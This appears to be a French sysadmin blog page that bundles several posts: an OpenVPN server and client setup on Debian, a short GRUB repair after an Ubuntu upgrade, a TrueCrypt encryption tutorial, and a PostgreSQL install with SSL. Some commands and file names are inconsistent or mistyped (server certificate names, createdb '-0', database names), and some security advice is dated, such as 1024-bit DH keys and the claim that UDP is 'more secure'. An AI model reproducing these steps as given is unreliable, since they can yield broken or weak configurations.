• le mode « routed », qui permet d’interconnecter des machines distantes, et donc d’appliquer un filtrage plus précis.

• Installation des paquetages serveur

Avant de pouvoir installer les paquetages d’OpenVPN, il est nécessaire d’avoir installé :

• les options du noyau par défaut

• la librairie LZO

• la librairie OpenSSL (ainsi que ses composants de développement)

Tous les paquetages nécessaires se trouvent dans les dépôts officiels.

Sur notre serveur Debian, la commande suivante installera les paquets :

apt-get install openssl libssl-dev liblzo1 liblzo-dev openvpn

Grâce à APT, le système de gestion de paquetages de la distribution Debian, les dépendances seront résolues, et l’application s’installe sans soucis.

• Génération des clés

Pour mettre en place notre infrastructure à clés publiques (PKI), il va falloir générer :

• une clé de pour le protocole d’échange diffie-hellman (dh1024.key)

• une clé et un certificat pour l’autorité de certification (ca.crt, ca.key)

• une clé et un certificat pour le serveur (srv-vpn1.key, srv-vpn1.crt)

• une clé et un certificat pour chaque client (client1.crt, client1.key)

Pour cela, des scripts existent pour simplifier la tâche. Il suffit d’exécuter un terminal en root, et de se déplacer dans le répertoire suivant :

su – root

cd /usr/share/doc/openvpn/examples/easy-rsa/2.0

Création de l’autorité de certification :

Éditer le fichier « vars » afin de paramétrer la PKI :

vim vars

• export KEY_COUNTRY=« FR »

• export KEY_PROVINCE=« France »

• export KEY_CITY= »Paris »

• export KEY_ORG=« Organisation « 

• export KEY_EMAIL=« contact@organisation.fr »

Initialisation des variables :

. ./vars

Ensuite, création du répertoire qui contiendra les clés :

./clean-all

Génération du certificat principal du serveur (ca.crt) et la clé correspondante (ca.key):

./build-ca

Nous confirmons les paramètres en appuyant à chaque fois sur [Entrée], sauf pour le Common Name, où il faut renseigner le « hostname » du serveur (exemple : srv-vpn1).

Création du certificat et de la clé pour le serveur OpenVPN :

./build-key-server srv-vpn1

Nous confirmons les paramètres en appuyant à chaque fois sur [Entrée]. Ce n’est pas la peine de renseigner le paramètre « Challenge Password ».

La signature du certificat se fait en renseignant [Y]qu’il faudra confirmer toujours avec [Y].

Création du certificat et de la clé pour un client OpenVPN :

./build-key client1

Nous confirmons les paramètres en appuyant à chaque fois sur [Entrée]. Chaque Common Name doit être différent pour chaque client (ici, nous renseignerons « client1 »). Ce n’est pas la peine de renseigner le paramètre « Challenge Password ». La signature du certificat se fait en renseignant [Y] qu’il faudra confirmer toujours avec [Y]. Cette procédure est à faire pour chaque client.

Création du paramètre Diffie Hellman :

./build-dh

Mise en place des certificats et des clés :

Copie vers le répertoire du service OpenVPN :

mv ./keys/ca.crt /etc/openvpn/
mv ./keys/serveur.crt /etc/openvpn/
mv ./keys/serveur.key /etc/openvpn/
mv ./keys/dh1024.pem /etc/openvpn/

Création de l’utilisateur du processus OpenVPN :

Dans un soucis de sécurité toujours, nous allons créer le groupe « openvpn », puis l’utilisateur « openvpn » (sans shell, et sans répertoire de connexion) qui exécutera le processus OpenVPN :

groupadd openvpn
useradd -d /dev/null -g openvpn -s /bin/false openvpn

• Configuration du service OpenVPN :

Nous allons partir de l’exemple fournis avec les paquetages :

cd /usr/share/doc/openvpn/examples/sample-config-files/
gunzip server.conf.gz
cp server.conf /etc/openvpn/

vim /etc/openvpn/server.conf

Voici la configuration :

# Port en écoute (pris au hasard par mesure de sécurité)
# Attention à bien configurer le NAT sur le routeur, pour pouvoir rediriger le port vers le serveur
port 2829
 
# Utilisation du protocole UDP, plus sécurisé
proto udp
 
# Configuration de l'interface en mode "routed"
dev tun
 
# Définition des chemins des certificats/clés
ca ca.crt
cert srv-vpn1.crt
key srv-vpn1.key
 
# Paramètres Diffie hellman
dh dh1024.pem
 
# Adresse du réseau virtuel
server 10.8.0.0 255.255.255.0
 
# Indique au client la route vers le réseau Intranet
push "route 172.48.0.0 255.255.255.0"
 
# Indique au client les informations DNS
 
push "dhcp-option DOMAIN organisation.fr"
 
# Ping tous les 10sec, si au bout de 120sec il n'y a pas de réponse alors déconnexion
keepalive 10 120
 
# Compression
comp-lzo
 
# Restriction du processus à un utilisateur
user openvpn
group openvpn
 
# Pour que la connexion persiste
persist-key
persist-tun
 
# Fichier de sorties de logs
status openvpn-status.log
 
# Verbosité standard des logs
verb 4

Redémarrage du service OpenVPN :

/etc/init.d/openvpn restart

Nous allons autoriser le serveur VPN à faire transiter des paquets vers un autre réseau :

echo 1 > /proc/sys/net/ipv4/ip_forward

Pour automatiser le dernier paramètre, il suffit de décommenter la ligne

net.ipv4.ip_forward=1

dans le fichier /etc/sysctl.conf.

• Installation des paquetages client :

• Sur un client Debian, la commande suivante installera les paquets nécessaires :

apt-get install openvpn liblzo1

• Sur un client Microsoft Windows, nous utiliserons le logiciel OpenVPN-GUI (disponible à l’URL http://openvpn.se/download.html)

• Configuration du client :

• Si le client est sous Linux, il faut créer un fichier de configuration situé dans /etc/openvpn :

vim /etc/openvpn/server.conf

• Si le client est sous Windows, il faudra éditer le fichier config situé dans C:\Program Files\OpenVPN\

Voici la configuration :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

client
dev tun
proto udp
 
# Adresse IP publique du serveur VPN, et son port d'écoute
remote 220.0.0.1 2829
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert client1.crt
key client1.key
comp-lzo
verb 4
 
# Rajouter ces 2 lignes pour un client Windows Vista
# ou Seven :
route-method exe
route-delay 2

Pour lancer la connexion sur Windows, il suffit de faire un clic droit sur l’icône « OpenVPN » situé à gauche de l’horloge et de choisir l’option « Connecter ».

Sur Linux, un redémarrage du service OpenVPN sera suffisant.

Une fois connecté, le client distant est dans le réseau privé virtuel, qui connait la route vers le réseau Intranet. Le serveur VPN étant la passerelle, les machines de l’Intranet n’ont pas besoin de connaître la route vers le réseau privé.

Pour vérifier l’état de la connexion, ou pour détecter le moindre de soucis, un

tail -f /var/log/syslog

ou encore la lecture du fichier openvpn-status.log renseigne toutes les informations nécessaires.

Pour aller plus loin :

Installer un serveur Proxy dans l’Intranet peut permettre au client de surfer sur Internet comme s’il était dans l’Intranet. Très utile pour déjouer les filtrages réseaux appliqués par certains FAI, ou tout simplement lorsque l’on se trouve derrière un proxy. Les paquets HTTP seront encapsulés dans le tunnel VPN, et décapsulés en sortie, et vice-versa pour le retour.

J’étais sous Ubuntu 10.10, et je désirais tester Ubuntu 11.04 sur mon ordi perso.

C’est pas la première fois que je fais ça, je sais pas ce qu’il m’est arrivé, mais j’ai démarré la mise à jour à 22h. J’ai fait le rêve de croire que ça serait finit vers minuit, et hop au dodo la conscience tranquille… mais c’était loin d’être le cas, et je peux vous dire que je n’ai pas dormis sur mes petits lauriers. Bref, je vais vous présenter les difficultés que j’ai rencontrées et qui apparemment concernent pas mal de monde.

sudo mount /dev/sdXx /mnt
sudo mount -o bind /dev /mnt/dev
sudo mount -o bind /sys /mnt/sys
sudo mount -o bind /proc /mnt/proc
sudo chroot /mnt

grub-install /dev/sda

update-grub

find -iname *compiz*

Si vous pouvez encore fermer votre session, ou accéder à un terminal pour vous déconnecter, faites-le… sinon faites le gros bourrin en utilisant la commande « shutdown –boutton » (cette commande n’existe pas, c’est de l’humour ).

Aujourd’hui, c’est un moyen de protéger ses fichiers que nous allons voir ensemble.

Certains mots reviennent toujours, comme par exemple le chiffrement qui est d’actualité. En effet, protéger vos fichiers revient à les mettre non seulement en lieu sur, mais surtout accessible que par vous même.

En premier lieu, nous pouvons définir quels types de fichiers il est intéressant de protéger :

• vos fichiers liés à votre vie privée (extraits de compte bancaires, documents officiels, fichiers de mots de passe, etc)
• vos fichiers professionnels (confidentiels ou non, ils ne regardent que vous)
• et tout autre fichier sensible comme vos certificats SSL par exemple, ou encore des documents secrets.

Voici maintenant plusieurs situations qui ne sont que des exemples, mais qui peuvent corrompre vos informations personnelles rapidement :

• vol, ou perte d’ordinateur (contenant un ou plusieurs disques durs)
• piratage de votre système (via Internet, ou le réseau de votre entreprise)
• accès à votre ordinateur par d’autres personnes (collègues ou amis)

Brefs, dans tous les cas, nous avons tous des fichiers sensibles, et nous allons voir comment les garder bien au chaud.

Une solution très efficace : Truecrypt .

C’est un logiciel qui permet deux choses :

• chiffrer des données à la volée (par un simple copier collé)
• stocker ces données soit dans un fichier qui sera monté comme un volume, soit sur une partition qui sera au préalablement formatée par Truecrypt.

L’avantage d’une telle solution est tout d’abord l’impossibilité pour une personne tierce de voir que vous utilisez un moyen de chiffrement. Le fichier ou le périphérique est complétement anodin, et vous offre le déni plausible dans une situation de force. En d’autres termes, personne ne vous mettra le couteau sous la gorge pour vous demander un mot de passe, puisque vos données sont stockées dans un fichier chiffré, qui n’a aucune apparence d’un fichier chiffré.

Nous allons voir l’utilité de ces deux fonctionnement possibles, mais avant tout sachez une chose : vos volumes seront protégés par un mot de passe, et si vous avez envie de renforcer la sécurité, par une clé SSL. Il est primordial de ne pas oublier ce mot de passe, sinon vos fichiers seraient perdus à jamais. De plus, il est bon de rappeler d’avoir des sauvegardes sur plusieurs périphériques différents, au cas où l’un deviendrait défectueux. Bon c’est finis, j’arrête de vous plomber le moral, et je passe à l’action.

• Téléchargement de Truecrypt

Ce logiciel est gratuit, et dispose d’une licence dite libre par les éditeurs, mais reconnue non open-source par certaines distributions Linux. Il fonctionne sous Linux, Mac OS X et MS Windows. Les données chiffrées sur un système d’exploitation sont bien entendu accessibles depuis un autre.

Voici le lien de téléchargement.

Pour le paquetage linux, je vous suggère la version « standard » qui comprend une interface graphique. Cependant, sur un serveur, la version « Console-only » sera la plus appropriée.

Il s’installe simplement en exécutant le binaire téléchargé, rien de bien compliqué.

• Utilisation de Truecrypt par la création d’un fichier

Nous l’avons dit plus haut, vous avez la possibilité de créer un fichier vide dans lequel vous placerez vos fichiers confidentiels. Ce fichier sera de taille fixe, et entièrement chiffré avec plusieurs algorithmes. C’est donc un moyen très facile pour envoyer des fichiers de manière ultra sécurisée par e-mail, par FTP, ou encore si vous devez les stocker sur une clé USB.

Cliquez sur « Volumes« , puis sur « Create New Volume » (chez moi c’est en anglais !). Choisissez ensuite « Create an encrypted file container » (1er choix par défaut). Pour la suite, un volume standard fera l’affaire dans la plupart des situations. Mais sachez qu’il est possible de créer un volume caché sur une partition. Il convient ensuite de choisir l’emplacement du fichier à créer, et son nom.

Ensuite, ce sont les algorithmes de chiffrement qu’il faudra sélectionner. Pour des petits volumes (5 Mo par exemple), je suggère la combinaisons des algorithmes « Serpent-Twofish-AES« , qui permettra une vitesse d’écriture d’environ 70 Mo/s selon votre matériel. Pour des gros volumes, vous pouvez soit utiliser la même chose que précédemment, tout en assumant la vitesse lente de copie, ou alors opter pour un seul chiffrement comme par exemple « Serpent », qui propose une vitesse moyenne d’écriture 130 Mo/s.

Personnellement, tous mes volumes utilisent « Serpent-Twofish-AES« , histoire n’être vraiment protégé. Les informations du volumes (mot de passe, etc) sont hachées, par l’algorithme de votre choix. Mon choix par défaut est « SHA-512″, développé par la NSA (oui, donc vous comprenez pourquoi je l’ai choisis !).

Il faut maintenant choisir la taille du fichier. A vous d’estimer combien de mémoire il vous faudra pour stocker vos fichiers confidentiels, sachant que pour un volume d’1 Mo, seuls 746 Ko seront disponibles.

Une fois votre fichier créé, il va falloir le « monter » avec Truecrypt. Dans la fenêtre principale, choisissez un slot de libre, puis cliquez sur « Select File« . En cliquant sur « Mount« , il vous sera demandé le mot de passe, et si besoin les clés SSL pour ouvrir le volume.

Copier vos fichiers dans ce volume reviendra à les chiffrer à la volée.

• Utilisation de Truecrypt par la création d’une partition

Si vous souhaitez protéger des fichiers présents sur votre ordinateur, il serait préférable de créer une partition qui serait dédiée.

Le principe de création est le même que pour un fichier conteneur.

Le mieux est de disposer d’une partition au préalablement formatée en NTFS. Truecrypt se chargera de la reformater avec les algorithmes choisis. Si vous ne savez pas lesquels choisir, reportez vous au paragraphe précédent.

Attention cependant sous MS Windows où la partition apparaitra comme une partition non formatée. Une fois montée, pas de soucis accéder librement à vos fichiers ! Ne vous faites pas avoir !

La partition se monte également avec Truecrypt en cliquant sur « Select device« , puis en sélectionnant le périphérique voulu.

Personnellement, j’utilise cette méthode pour conserver sur mon ordinateur des fichiers sensibles.

Sachez toutefois qu’il faut démonter le volume une fois que vous quitter votre ordinateur :

• Sous MS Windows, une déconnexion d’utilisateur n’entraine pas le démontage du volume, attention donc si vous utilisez des sessions !
• Les fichiers étant montés sur l’ordinateur, restent à la merci de tout pirate ayant accès à votre ordinateur.

Il faudra donc éviter de mémoriser les mots de passe des volumes (en désactivant l’historique), ainsi que de les laisser ouverts.

Enfin, je vous conseille vivement un mot de passe long et compliqué (au moins 15 caractères avec des lettres, des chiffres et des symboles). Par exemple, une phrase mnémotechnique peut faire l’affaire. En effet, avec un outil de bruteforce il serait possible d’ouvrir le fichier ou périphérique au bout d’un certain temps. Plus votre mot de passe est long et dur, plus de temps il sera nécessaire pour accéder aux données.

• Conclusion

Truecrypt est un logiciel de chiffrement à la volée parmi tant d’autres.. Pas de backdoor, et le code source est complètement ouvert à tous.

Sachez que l’application est également disponible en « application portable » et qu’il est possible (et même conseillé) de changer les mots de passe des volumes autant de fois que l’on souhaite.

Protéger ses fichiers est aussi important que de protéger ses informations personnelles.

Dans un environnement toujours plus « online », il est plus que nécessaire d’utiliser ce type de solution. A bon entendeur !

[Edit] J’ai pris en compte vos commentaires, et je remercie des précisions qui m’ont été apportées. J’ai bien entendu corrigé le fait que Truecrypt n’est pas un logiciel reconnu comme libre. Merci de faire vivre ce blog !

• Présentation de PostgreSQL

PostgreSQL est un outil libre et fondé par une communauté mondiale de développeurs et d’entreprises. Il permet de stocker plus de types de données que les types traditionnels entier, caractères, etc… L’utilisateur peut créer des types, des fonctions, utiliser l’héritage de type et encore d’autres fonctionnalités très intéressantes. Réputé pour sa stabilité, et son excellente compatibilité avec la norme ANSI SQL, mon choix s’est porté vers PostgreSQL par rapport aux besoins de performances des entreprises. En effet, les applications Web utilisent d’une part une base de données MySQL pour la partie front-end (les performances sont meilleures pour de petites requêtes vers une petite base de données), et d’une autre part une autre base de données PostreSQL pour les grosses requêtes sur des bases de données importantes, souvent utilisées par les applications métier.

Note : Dans ce billet, nous considérons avoir un serveur de base de données, un serveur web et un serveur d’applications séparés.

• Installation des paquetages

Nous considérons que nous possédons déjà un système d’exploitation Debian GNU/Linux installé sur la machine.

Nous allons maintenant installer les logiciels nécessaires :

apt-get install postgresql

Il est intéressant de remarquer que les dépendances vont être automatiquement installées (grâce au système de gestion de paquets APT).

• Configuration de PostgreSQL

Lors de l’installation, l’utilisateur «  postgres » est créé automatiquement. Par défaut, le mot de passe de cet utilisateur n’est pas connu. Par mesure de sécurité, nous allons en affecter un et nous passerons sous l’utilisateur « postgres » sans passer par l’utilisateur « root » pour exécuter les processus (et donc éviter de lui donner trop de permissions) :

passwd postgres

Pour travailler sur la base de données, il faut commencer par se connecter sous le compte de ce nouvel utilisateur :

su – postgres

Par défaut les instances se trouvent dans le répertoire /var/lib/postgresql (c’est le ~postgres). Elles sont gérées avec les wrappers en Perl pg_*cluster.

Par exemple pg_createcluster utilise en fait la commande /usr/lib/postgresql/bin/initdb -D <datadir>.

Il faut également avoir des droits corrects sur /tmp/ et d’autant plus pour PostgreSQL sans lesquels l’installation échouera complètement :

chmod 1777 /tmp

Nous allons créer notre base de données qui sera utilisée par l’application métier, mais tout d’abord, il faudra créer un utilisateur qui sera dédié à cette base de données.

# su – postgres

$ createuser dbadmin -P -D -A

$ createdb -0 dbadmin -E UNICODE DB1

Note : dbadmin sera l’utilisateur de la base de données DB1, elle même encodée en UNICODE.

Ensuite, il convient de configurer deux fichiers : pg_hba.conf et postgresql.conf.

Notons que les fichiers de configuration se trouvent dans le répertoire /etc/postgresql/8.3/main et la modification de ces derniers se font avec le super utilisateur « postgres ».

Le fichier pg_hba.conf permet de régler les permissions. Voici la syntaxe :

local DATABASE USER METHOD [OPTION]

host DATABASE USER CIDR-ADDRESS METHOD [OPTION]

hostssl DATABASE USER CIDR-ADDRESS METHOD [OPTION]

hostnossl DATABASE USER CIDR-ADDRESS METHOD [OPTION]

La ligne « local » permettra d’être en écoute « localement » sur la machine.

Le champ « DATABASE » concerne une base de donnée précise. Ce champ peut être de valeur « all » pour toutes les bases de données, « sameuser, « samerole », ou encore un nom précis de base de données.

Le champ « USER » peut être un nom d’utilisateur précis, un nom de groupe (avec le préfixe « + ») ou une liste d’utilisateurs séparés par des « - ».

Le champ « CIDR-ADDRESS » spécifie l’adresse IP (V4 ou V6) d’un hôte ou réseau distant ainsi qu’un masque de sous-réseau.

Le champ « METHOD » énonce la méthode d’authentification.

Le champ « [OPTION] » peut être utile lors d’une authentification avec PAM par exemple.

Voici maintenant notre fichier de configuration pg_hba.conf :

local all postgres ident sameuser

hostssl BDD1 dbadmin 192.168.53.1/32 md5

Ce fichier de configuration permet à l’utilisateur « postgres » d’accéder à toutes les bases de données en local, et notre serveur d’application distant pourra accéder à la base de données BDD1, avec l’utilisateur dbadmin, avec une authentification protégée par md5. Notez que dans cette configuration, une connexion SSL est exigée pour le serveur distant. Cela évite dans le cas d’une attaque « Man-on-the-middle » qu’une personne tierce accède aux données échangées.

Ensuite, il faut modifier le fichier de configuration postgresql.conf. Voici les paramètres à modifier ou à ajouter :

listen_addresses = ‘*’

port = 5432

ssl = on

password_encryption = on

Il faudra ensuite créer un certificat pour l’échange des données clients/serveur.

Nous allons créer un certificat auto-signé, dédié à PostgreSQL :

$ cd /var/lib/postgresql/8.3/main/

$ openssl req -new -text -out server.req

$ openssl rsa -in privkey.pem -out server.key

$ openssl req -x509 -in server.req -text -key server.key -out server.crt

$ rm privkey.pem

$ chmod 600 serveur.key

Note : Ces commandes sont réalisées avec l’utilisateur « postgres ».

La clé et le certificat sont crées et protégés, nous pouvons maintenant redémarrer le service PostgreSQL :

$ /etc/init.d/postgresql-8.3 restart

Le serveur peut désormais se connecter au serveur de base de données, avec les paramètres suivants :

Hôte du serveur : 192.168.53.153

Port TCP : 5432

SSL : exigé

Base de données : BDD1

Utilisateur : dbadmin

Mot de passe : <mot de passe de l’utilisateur dbadmin>

La base de données est maintenant crée, et configurée de manière à ce que les accès y soient sécurisés.